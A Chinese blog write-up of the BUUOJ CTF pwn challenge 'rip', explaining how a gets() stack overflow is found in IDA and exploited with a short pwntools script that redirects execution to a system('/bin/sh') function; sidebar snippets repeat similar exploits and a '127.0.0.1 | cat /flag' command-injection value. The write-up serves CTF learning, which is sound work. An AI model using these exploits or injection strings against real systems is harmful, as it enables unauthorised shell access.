buuoj

最新推荐文章于 2023-10-15 10:34:58 发布
最新推荐文章于 2023-10-15 10:34:58 发布
阅读量87 收藏
点赞数 1
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130917395
版权

题目(二):
【题型】PWN
【题目】rip
【来源】(buuoj)https://buuoj.cn/challenges#rip
【思路】栈溢出
【具体步骤】
Step1:使用checksec指令检查是否有保护,发现是一个没有任何保护(NX)的64位的程序,开启了栈不可执行。
在这里插入图片描述

Step2:将文件放到IDApro下进行静态分析。
在这里插入图片描述

Step3:点击view下的open subviews下的strings,然后发现bin/sh,点击查看
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Step4:然后按下shift+X,发现/bin/sh的地址在fun函数里面,然后查看fun函数,(先找到fun函数,然后点击F5,如果被占用,则按下Fn加F5)顺便查看fun函数的起始地址。Fun函数内容发现返回system函数。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Step5:查看主函数,点击main,然后F5查看伪代码,发现里面有一个gets函数,s的长度为0xf(0x0+0x0f=0x0f),但是栈的大小只有15个字节,gets可以无限输入,所以存在栈溢出。
在这里插入图片描述
在这里插入图片描述

Step6:编写代码,构建exp。
源码为:

from pwn import *
p=remote("node4.buuoj.cn",26085)
payload='A'*15+'B'*8+p64(0x401186+1).decode("iso-8859-1")
p.sendline(payload)
p.interactive()

在这里插入图片描述

Step7:然后输入ls,发现可以与shell交互,然后查看文件有flag这个文件,查看这个文件,输入指令cat flag,得到flag。
在这里插入图片描述

22的卡卡
关注
专栏目录
BUUCTF|rip
cm_zl
04-30 2181
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
BUUOJ-Web-刷题记录
x0r
09-01 387
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
buuoj rip
weixin_52942048的博客
10-15 97
栈溢出利用
buuoj —— rip
qq_41027231的博客
05-27 610
常规思路 s溢出后将返回地址修改为fun函数地址,然而出错了 from pwn import * # context(os="linux", arch="amd64", log_level="debug") p = remote('node3.buuoj.cn',27714) # p = process('./pwn1') elf = ELF("./pwn1") f_addr = elf.symbols["fun"] payload = 'a'*23 + p64(f_addr) p.sendline(pa
rip-buuoj
怪味巧克力的博客
07-15 1049
#前言 今天开始学pwn,以练促学,学以致用,加油加油 0x01 拿到文件,首先检查一下是多少位的,如图 可以看到是64位的文件 检查是否有保护,如图 看到没有任何保护 0x02 ida分析一下函数的逻辑 进入到反汇编如下,代码逻辑就是让我们输入,然后结束,我们主要看一下gets,因为gets有栈溢出漏洞 我们发现输入的地址空间大小为15,然后就执行函数返回地址,那么我们直接在15后将系统命令函数地址填入即可,或者直接写函数的名称,然后取函数地址也可以 0x03 exp from pwn impo
BUU-rip
qq_45771413的博客
04-27 747
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj-crypto
Ennd_me的博客
04-29 351
buuoj-crypto
buuoj--sqlilabs
weixin_30270815的博客
03-21 840
CTF欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑
buuoj 百里挑一
pondzhang的专栏
07-08 1237
tcp流114和其他有明显区别,并且提示有exif 初步考虑有exiftool工具,通过导出对象图片检测 exiftool * | grep flag 恭喜你!找到一半了,还有另一半哦!flag{ae58d0408e26e8f 再将流114手工导出保存为图片(该图片格式不标准,无法自动导出) exiftool 1.jpg ExifTool Version Number : 10.10 File Name : 1.jpg Directory
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 3091
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1779
[BUUCTF]-rip 题目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3916
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2712
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
BUUOJ [HCTF 2018]WarmUp
qq_43622442的博客
04-11 759
BUUOJ [HCTF 2018]WarmUp 第一次参加ctf,这次头铁的报名了网鼎,hhh,不能给队伍拖后腿了,还是刷刷题。 从buuoj一题一题开始刷,第一题WarmUp。 1.打开网站,发现只有一个滑稽: 2.因为是做的web题,不太可能是隐写,F12看看源码: 3.看到这个source.php没有?访问一下看看: 4.也就是代码审计了,不过这个咋和phpmyadmin的文件包含漏...
BUUCTF_2.RIP覆盖一下
Jc
07-05 3887
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 $checksec ./文件名 2.代码审计 不管在简单题都一定要IDA查看一下伪代码(IDA做好是7.0以上的版本) 首先查看敏感字符串(Ctrl+1) 1.gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1499
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
计算机图形学之动画和模拟算法:粒子系统在自然现象模拟中的应用.docx
11-06
计算机图形学之动画和模拟算法:粒子系统在自然现象模拟中的应用.docx
基于matlab的注水算法源码.zip
最新发布
11-06
OFDM和MIMO系统模型下的功率分配
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值